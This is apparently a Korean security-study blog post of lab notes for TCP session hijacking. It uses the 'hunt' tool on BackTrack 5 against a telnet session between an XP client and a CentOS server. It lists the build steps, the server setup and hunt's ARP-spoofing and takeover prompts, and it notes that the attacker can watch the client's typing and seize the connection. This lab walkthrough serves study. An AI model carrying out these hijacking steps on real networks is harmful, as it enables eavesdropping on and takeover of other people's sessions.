728x90
반응형
Session hijacking
*Session hijacking - MITM 보단 구성하기가 까다롭고 성공하기 어렵다. TCP를 이용한 프로토콜에는 거의 적용. 성공할 수 있으나 자동화된 툴을 사용하지 않고서는 거의 불가능.
<BT5>
http://packetstormsecurity.org/
hunt-1.5.tgz
disable = no
# useradd usera
# passwd usera
# service xinetd start
<BT5>
http://packetstormsecurity.org/
hunt-1.5.tgz
# cd ~
# tar zxvf hunt-1.5.tgz
# cd hunt-1.5
# make
# ./hunt //이프로그램은 기본적으로 eth0을 잡고 있기 때문에 eth0이 아니라면 설정을 같이 해준다.
./hunt -i eth3 (hunt 접속 한다음 텔넷 접속해야한다)
<Centos>
# yum install telnet-server
# vi /etc/xinetd.d/krb5-telnet
disable = no
# useradd usera
# passwd usera
# service xinetd start
<XP>
# telnet x.x.x.x(Centos ip)
<BT5>
l (list connection) 세션 확인
a
choose conn> 0
arp spoof src in dst y/n [y]> y
src MAC [EA:1A:DE:AD:BE:01]>
arp spoof dst in src y/n [y]> y
dst MAC [EA:1A:DE:AD:BE:02]>
input mode [r]aw, [l]ine+echo+\r, line+[e]cho [r]> r
dump connectin y/n [y]>
dump [s]rc/[d]st/[b]oth [b]> d
클라이언트가 타이핑 하는것을 모니터링 가능함
ctrl+c 키를 누르면 <Session Hijacking>
클라이언트에서 다시 타이핑 하면 서버와 연결이 끊어져 버림
다시 BT에서 엔터를 치면 세션이 넘어옴!!!
공격자에서 ctrl c 누르면 RST가 나간다.
반응형
'Cyber Security' 카테고리의 다른 글
네트워크 정보 수집 (0) | 2015.01.22 |
---|---|
포트 스캐닝/포트스캔 - Nmap (0) | 2015.01.22 |
[정보보안] DDoS(Distribute Denial of Service attack) (0) | 2015.01.22 |
DNS spoofing, SSL Webmitm (0) | 2015.01.21 |
[정보보안] ARP spoofing 실습 (0) | 2015.01.21 |